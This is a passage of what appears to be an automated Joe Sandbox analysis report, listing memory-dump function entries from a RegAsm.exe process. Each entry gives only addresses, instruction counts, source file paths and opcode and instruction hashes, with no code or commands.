                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b69f0fe3bc898bc74e3dea87bd4e90a9dc181752d0e794c3047520fd57e77d51
                                                      • Instruction ID: 4b0e13dd29382ff146ee457f024a434b61d72e36f03b39ee6f6e36a7074183a1
                                                      • Opcode Fuzzy Hash: b69f0fe3bc898bc74e3dea87bd4e90a9dc181752d0e794c3047520fd57e77d51
                                                      • Instruction Fuzzy Hash: C3319834B102119FCB55DF78D884A6EBBB2FF89201B508469FA06CB365DB31ED06CB91
                                                      Function 068F87A0 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d0af29881743911cf85c527fe5bd3874e61814558ba36e6842d5081d24742ea
                                                      • Instruction ID: 643e7a0b223c109c3c3c4e91b2e0568b5df8ba1e375f51d372379e69813b88d1
                                                      • Opcode Fuzzy Hash: 3d0af29881743911cf85c527fe5bd3874e61814558ba36e6842d5081d24742ea
                                                      • Instruction Fuzzy Hash: FF4101B1D112489FDB18DFAAD944ADEFFB6AF88310F10802AE915A7254DB34A945CF90
                                                      Function 0701B7A0 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d4ddcca5fe977285e1d75d66d59d4fe23cd8a87b6dcf7f914843fc75a22a1cf
                                                      • Instruction ID: fca3bcb721b369ea6be49a494bfdc129fd079b72d771e35a4f60475bd86170f3
                                                      • Opcode Fuzzy Hash: 5d4ddcca5fe977285e1d75d66d59d4fe23cd8a87b6dcf7f914843fc75a22a1cf
                                                      • Instruction Fuzzy Hash: 5E3116B4E042089FDF18DFA9E894AEDBBF2BF89700F14912AE415B7390DB705941CB54
                                                      Function 0701D078 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fceaac31b90e099371b1a9d673e67fbe498cb171b801ebca49ac1a5d317fa5d
                                                      • Instruction ID: 60f8f372c313570d088d413b6e87d26c593bd5e6b5947ca6d2e988fa6748acb6
                                                      • Opcode Fuzzy Hash: 1fceaac31b90e099371b1a9d673e67fbe498cb171b801ebca49ac1a5d317fa5d
                                                      • Instruction Fuzzy Hash: D721E2B1B04219EFCB51CFA8E4445EEBBF5EF44215F1481AAE40DD7211E732EA85CB81
                                                      Function 0701B5A6 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5948dd849216a40cb09b94b6df529a23c78554b26fea7fd3286e1282629883e6
                                                      • Instruction ID: ae12311170f5b18f53a10f0f8a183a6d5ffd30a16e112abf08ae6509739914c9
                                                      • Opcode Fuzzy Hash: 5948dd849216a40cb09b94b6df529a23c78554b26fea7fd3286e1282629883e6
                                                      • Instruction Fuzzy Hash: C73107B4D05218CFDB60DFA8D9547EDBBB1FF4A301F1052AAD41AA7251DB349A81CF01
                                                      Function 0701B43D Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94661bcefbe51688f4739fc945660fd4849e92f24ccb01a975b62b657e1398df
                                                      • Instruction ID: 2e6c9d36426d36327ffd17bbd9454e01fe23eac0316c793c0b1e51394ad825af
                                                      • Opcode Fuzzy Hash: 94661bcefbe51688f4739fc945660fd4849e92f24ccb01a975b62b657e1398df
                                                      • Instruction Fuzzy Hash: 0231CEB4D04228CFCB60DFA8C9447EDBBB2FF4A301F1091AAD51AA7251DB349A81CF41
                                                      Function 0701B793 Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aaef064c11f3e1c588c9ab02585fa7e12c536103ae2bedd1af09342652c14c44
                                                      • Instruction ID: 3bba0a3d60500604f0137ea086fcc4b4d87f6cfc10a89f979fbcdabab1aa0791
                                                      • Opcode Fuzzy Hash: aaef064c11f3e1c588c9ab02585fa7e12c536103ae2bedd1af09342652c14c44
                                                      • Instruction Fuzzy Hash: 1231F4B4E012199FDB18DFA9D898BEDBBB2BF88700F14912AE411B7390DB745941CF54
                                                      Function 068F8796 Relevance: .1, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 98ddd50fe020cbc613bfe10ba32e884920baf65e80e786cf4ca6be6c42781d36
                                                      • Instruction ID: 1b856c6953820056cc6c0ca0211afd7e50261d038124c02eac16205290191d12
                                                      • Opcode Fuzzy Hash: 98ddd50fe020cbc613bfe10ba32e884920baf65e80e786cf4ca6be6c42781d36
                                                      • Instruction Fuzzy Hash: C43103B1D2124C9FDB24DFAAC944BDEBFF6AF48310F14802AD515A7290DB749945CF90
                                                      Function 0701F0FF Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39bbc328144aba36073bec4c1e463a3fec57a8ceb3bbb3177482da0e1de975b8
                                                      • Instruction ID: 09332185e64da0088989870e587e5772d5e90386af439f0c0d2d1219862175b7
                                                      • Opcode Fuzzy Hash: 39bbc328144aba36073bec4c1e463a3fec57a8ceb3bbb3177482da0e1de975b8
                                                      • Instruction Fuzzy Hash: BF317F74A0131ADFDB11EFA5E840ADEBBB4FF44305F108B55D5089B119DB717A4ACB81
                                                      Function 068F8A98 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0986229a5655114fd45dbebfce61e82a7976bb1da7a9dcd6bf8d042304d99f16
                                                      • Instruction ID: cc5e3d9aab0931b730b1dfd9a326a4c981bb2e687786c578df3454f024e45eed
                                                      • Opcode Fuzzy Hash: 0986229a5655114fd45dbebfce61e82a7976bb1da7a9dcd6bf8d042304d99f16
                                                      • Instruction Fuzzy Hash: F13111B5D11348DFDB14CFAAD895BDEBBB5AF48310F24842AE519F7240CB74A846CB90
                                                      Function 0701F020 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e003f13250864a4d99ba8ed83a543f5a3f57de5ef43c955bc400ffc534205138
                                                      • Instruction ID: 99bf205aef35045b21ffc5e7ed7ec2d7b535cba31018987f76f178a7cd4e63b3
                                                      • Opcode Fuzzy Hash: e003f13250864a4d99ba8ed83a543f5a3f57de5ef43c955bc400ffc534205138
                                                      • Instruction Fuzzy Hash: 1021AE71E0071E9BCB15DFA8D8406DEB7B5FF85310F10432AE605AB254DB71AD46CB80
                                                      Function 0141D4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1659813626.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_141d000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82d4a170e5950d7f93be101cfad90db17615904e84c3b57a056d1ac0ed107241
                                                      • Instruction ID: 9203dd5b46477fc317bd257ebc03ef513793dab44363fca0e95c46e3a5406e19
                                                      • Opcode Fuzzy Hash: 82d4a170e5950d7f93be101cfad90db17615904e84c3b57a056d1ac0ed107241
                                                      • Instruction Fuzzy Hash: 602125B1904240DFDB15DF54D9C8B27BF61FB88328F24C56AD8090B36AC336D456CBA2
                                                      Function 068D105C Relevance: .1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ea399f878f94285e0ca9dc73cf8e06097b9ff18309072d7cd53f46e95cb3889
                                                      • Instruction ID: 099572ddf1c000e150f51b44b691a6db5cd5e6b3183ec44efe1a582ea2bc10aa
                                                      • Opcode Fuzzy Hash: 5ea399f878f94285e0ca9dc73cf8e06097b9ff18309072d7cd53f46e95cb3889
                                                      • Instruction Fuzzy Hash: 3B21F530B012049FDB45DB699D48ABEFBFBFF98210B15956AD516C72A6DB30CC10C7A1
                                                      Function 0701B636 Relevance: .1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f95313b3b051220f8b90f150dbf4fc92152a9321c1ff63b82fe7ac4cf1bf3f3e
                                                      • Instruction ID: 63fe0c7e38b380adb069a901e503e0567e0b86558faeae3b553d76ebe8f9e0a2
                                                      • Opcode Fuzzy Hash: f95313b3b051220f8b90f150dbf4fc92152a9321c1ff63b82fe7ac4cf1bf3f3e
                                                      • Instruction Fuzzy Hash: D831C3B4E04319CFCB60DF78D854BADBBB1BF4A311F1051AAD55AA7251DB309A82CF41
                                                      Function 02C8D01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1659948897.0000000002C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c8d000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 377ff1c75a240d0f87bbf9a72b1ef500c766d71636e8bd8fcc806d94e04ac9cd
                                                      • Instruction ID: 0659d351396078d3bc67793f1474615fed6a4eb834b523caf38fa7b19caa7707
                                                      • Opcode Fuzzy Hash: 377ff1c75a240d0f87bbf9a72b1ef500c766d71636e8bd8fcc806d94e04ac9cd
                                                      • Instruction Fuzzy Hash: 64213471604300EFDB14EF20D9C4B16BB61EB84328F20C5ADD84A4B386C336D847CBA2
                                                      Function 0701AA78 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f8ab80ccb39dd042f57aad3c62c529a30f5011797792e96b68597d0ed9eef466
                                                      • Instruction ID: 2f9e9888df2686aa61b4131b22cc9e1c2375ac5ec2946e3d3005f04fda84a2c5
                                                      • Opcode Fuzzy Hash: f8ab80ccb39dd042f57aad3c62c529a30f5011797792e96b68597d0ed9eef466
                                                      • Instruction Fuzzy Hash: 0131AEB4E05209DFCB44CFA9C5806EEFBF1BB49304F14916AC815A3241D7355A46CF54
                                                      Function 068F8F42 Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 324ff8a986e3db3ad0bcbce1433ab319514ddb79f419c46ebddb6193ec9fba07
                                                      • Instruction ID: 3b1cbc698c4a831b2909359f1bf1f44d0e529f5099f687f7722d14a7d64a4d11
                                                      • Opcode Fuzzy Hash: 324ff8a986e3db3ad0bcbce1433ab319514ddb79f419c46ebddb6193ec9fba07
                                                      • Instruction Fuzzy Hash: B72124B8D1425ADFCB54CFA8D4846EDBBB0FB09311F1040AAE625E7391D7745A82CF90
                                                      Function 068F8A8C Relevance: .1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db17b02c6af50a44d4a97288095aa927f049a389204a9fbbe2934519782832f4
                                                      • Instruction ID: b98b9a6883472de79146428572c9892537baf3569afddbbf90ca6ee6d5b53771
                                                      • Opcode Fuzzy Hash: db17b02c6af50a44d4a97288095aa927f049a389204a9fbbe2934519782832f4
                                                      • Instruction Fuzzy Hash: 202124B1D103489FDB24CFA9C895BDEBBF9AB48310F24842AE504E7340DB749846CBA4
                                                      Function 0701C260 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 402872d0cac8e2763fc01b4baccd8eab27237cf217ecf2e84b1dbca6ac0e7334
                                                      • Instruction ID: dca38989e60d7f8b107b20cdb408614e98ec926c103fc21252e127c0a6fbee8f
                                                      • Opcode Fuzzy Hash: 402872d0cac8e2763fc01b4baccd8eab27237cf217ecf2e84b1dbca6ac0e7334
                                                      • Instruction Fuzzy Hash: 11110871A053095FDB15DBA9D81065EBBE6FFC5220B1485A9E8099B350DF31DC01C7A1
                                                      Function 02C8D005 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1659948897.0000000002C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c8d000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fda08ca254bca175709b18f0a859468bca849022117648539dc2bf62aab9b59
                                                      • Instruction ID: 1ae141f7a34b6b03270fa9aedfe959f360894d7a875fb46a4780f5eaf835f53a
                                                      • Opcode Fuzzy Hash: 1fda08ca254bca175709b18f0a859468bca849022117648539dc2bf62aab9b59
                                                      • Instruction Fuzzy Hash: E72195755093C08FCB02DF24D590715BF71EB46218F28C5DAD8898F697C33A980BCB62
                                                      Function 068FBC5F Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 782d86f2000b7c386f94245aa9e8c653e4cede0d5fd2f8d88d78e3732b76b585
                                                      • Instruction ID: feff1c5b299eff0943f3603dc6fc808105e7c9e962cebf257aa46610889453be
                                                      • Opcode Fuzzy Hash: 782d86f2000b7c386f94245aa9e8c653e4cede0d5fd2f8d88d78e3732b76b585
                                                      • Instruction Fuzzy Hash: 8411E1302012095FC396BB31A8149AE7FE7FEC2161304482DE5078BA15CE307E4F87E2
                                                      Function 0701B20F Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c8832652afd684ff39786d54225c53a69dd0633de3cfc4bdedb48aa028554a2
                                                      • Instruction ID: 1e61643d88237277f4403e904a1f183228375394a7850721bde567252a7a6b72
                                                      • Opcode Fuzzy Hash: 6c8832652afd684ff39786d54225c53a69dd0633de3cfc4bdedb48aa028554a2
                                                      • Instruction Fuzzy Hash: 3A114CB1E0025A9FCB55DBA8C450AEEBBF1FF88210F14816AD515F7390DB345945CBA1
                                                      Function 0701B8F8 Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 363b15a647f6c5acea699e9bcb21fbb67e92e310c386c8ccdda5ed78ffecc1a9
                                                      • Instruction ID: 958a42ba69ba6a5a788a935e7005d692fe2b186330979d0b3f51a0b0b8575e35
                                                      • Opcode Fuzzy Hash: 363b15a647f6c5acea699e9bcb21fbb67e92e310c386c8ccdda5ed78ffecc1a9
                                                      • Instruction Fuzzy Hash: 6511E7B4E10218EBCB58DFA9D444AEDBBF6FF89310F00812AE815A7314DB345842CF55
                                                      Function 0701B0CD Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02f102e76c652b812f8f3ad1183f4c4b24404dd536e3bae8960dd6f22edb959e
                                                      • Instruction ID: 8197a0e6c8ea536fd8cd327a4bb9e94cdb02adce0c872fb3df9a687c5ae63e48
                                                      • Opcode Fuzzy Hash: 02f102e76c652b812f8f3ad1183f4c4b24404dd536e3bae8960dd6f22edb959e
                                                      • Instruction Fuzzy Hash: 0721F3B4E1522CCFCB24CFA5D8847ECBBB1FB4A315F4091AAD059A7241D7749A81CF00
                                                      Function 068D4B1C Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4369486a241b4c8266b63275dfb224576f14551b86fc25dace01ca36f41056e0
                                                      • Instruction ID: e99edf6f9c1bd7d74875a496990fceefef4109f81d167861d0e5c3af8c929185
                                                      • Opcode Fuzzy Hash: 4369486a241b4c8266b63275dfb224576f14551b86fc25dace01ca36f41056e0
                                                      • Instruction Fuzzy Hash: 8C116DB1B402015FCB45EB78D864A6EFBF2FF89610B24885DD14ADB3A5DA31DC058BA1
                                                      Function 0141D4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1659813626.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_141d000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
                                                      • Instruction ID: e4e303b281600616ebfe91d8c84c61548655253fe8aa7964eef89cab7f10addf
                                                      • Opcode Fuzzy Hash: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
                                                      • Instruction Fuzzy Hash: B211B1B6904280CFCB16CF54D9C4B16BF71FB84328F24C6AAD8494B66AC336D456CBA1
                                                      Function 0701AA68 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4d56d2040109f6dafd64ca3c143b978f597b821cf4ce06ce51b303d6088e2ab
                                                      • Instruction ID: b95a768ad967056cf02c51fdc9e76f5ec5c46b1c6427cbb06ce430dcd5a93e90
                                                      • Opcode Fuzzy Hash: c4d56d2040109f6dafd64ca3c143b978f597b821cf4ce06ce51b303d6088e2ab
                                                      • Instruction Fuzzy Hash: D221C3B4E052199FCB44CFA9C9446EEFBF1BF49304F14C2AAC815A7241D7355A46CF90
                                                      Function 0701B900 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c478250a1fa1d96a9d6fbedaf5bb5df7fef9f09b5bf3c063afe7c1909cfd9d4
                                                      • Instruction ID: 50efb14e40e3c8cdd96e8573820cce9bc5e3cea55f6dd123428cc8818ff42664
                                                      • Opcode Fuzzy Hash: 2c478250a1fa1d96a9d6fbedaf5bb5df7fef9f09b5bf3c063afe7c1909cfd9d4
                                                      • Instruction Fuzzy Hash: EF11B0B5E10218EBCB58DFA9D884AEDBBF6FF89310F10816AE815A7350DB309841CF55
                                                      Function 068F6E90 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f32a48b4b7f376115e2493960ab7a0a06cd0f1650b9b4fcb7eb59cc7ad1e5da8
                                                      • Instruction ID: 1d8cc64e1a09c21835e3b505683bd9af4c81301843a34b9028a53f513658529d
                                                      • Opcode Fuzzy Hash: f32a48b4b7f376115e2493960ab7a0a06cd0f1650b9b4fcb7eb59cc7ad1e5da8
                                                      • Instruction Fuzzy Hash: FC01D4336040E52E8B615AA95C50AFF3FE9EB8D161B084166FB98C6241D428C952ABB0
                                                      Function 0701B9B8 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f2f9d18625d7e8333ce470a50a37ec7549c66b257db2e2fccca27693e6970784
                                                      • Instruction ID: f631b62a7bbe4d06e320181bd6c8e2f57ed0250699789e08f4066eb87de37a03
                                                      • Opcode Fuzzy Hash: f2f9d18625d7e8333ce470a50a37ec7549c66b257db2e2fccca27693e6970784
                                                      • Instruction Fuzzy Hash: 891134B4E04219DFCB56DFB8D4446ADBBF1FB0A310F1096AAD424A3294DB305A41CF01
                                                      Function 0701AB48 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3768be03a6ad98f3fceba1dc84c87384dc687ddcb3a7e9239f4eae81018eed25
                                                      • Instruction ID: edaaec694adfa9fe788cc72a50f78aaac4aa48e8c402b2478d535399002a57f2
                                                      • Opcode Fuzzy Hash: 3768be03a6ad98f3fceba1dc84c87384dc687ddcb3a7e9239f4eae81018eed25
                                                      • Instruction Fuzzy Hash: F3117CB5E0124A9FCB54DBA8D855AEFBBF2FF89310F10816AD105A7391DB385901CBE1
                                                      Function 0701C7C8 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 521c6ff6bf8e99814588ba0e19dec8bc99a8426970c74c93c74f3eccedbf15d8
                                                      • Instruction ID: abc852109a27c8b22f45db7deadb107835974e7a724faf41ab931ec24c00518e
                                                      • Opcode Fuzzy Hash: 521c6ff6bf8e99814588ba0e19dec8bc99a8426970c74c93c74f3eccedbf15d8
                                                      • Instruction Fuzzy Hash: D10145B1A003154FD320EB39D8408AF7FE6EF846207048A2AD445CB215EB30E9098BA1
                                                      Function 068FC499 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
